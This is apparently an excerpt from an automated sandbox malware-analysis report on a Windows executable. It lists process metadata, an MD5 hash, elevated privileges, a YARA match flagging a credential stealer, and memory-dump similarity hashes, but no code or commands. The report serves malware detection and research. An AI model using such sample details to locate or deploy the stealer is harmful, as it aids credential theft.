                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\zi042476Iv.exe"
                                                                                                                                  Imagebase:0x160000
                                                                                                                                  File size:2'941'952 bytes
                                                                                                                                  MD5 hash:E5C73B43BD01BB3580AF440576A00AD3
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.1617123572.000000000136F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0136F000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_136f000_zi042476Iv.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: i
                                                                                                                                    • API String ID: 0-3865851505
                                                                                                                                    • Opcode ID: 1d2680476f7066c1844bec7c8aa08bed72d0824c404dc1dcbc35a819abc5e769
                                                                                                                                    • Instruction ID: 1c3f4731bde33c3f13227261313fb8723d19acda2f41a78394b2d98ac1dcbd76
                                                                                                                                    • Opcode Fuzzy Hash: 1d2680476f7066c1844bec7c8aa08bed72d0824c404dc1dcbc35a819abc5e769
                                                                                                                                    • Instruction Fuzzy Hash: C74100A241E3C08FD3438B7089616813FB1AF13618B1E44EBC4C1CF4B3E269991AD722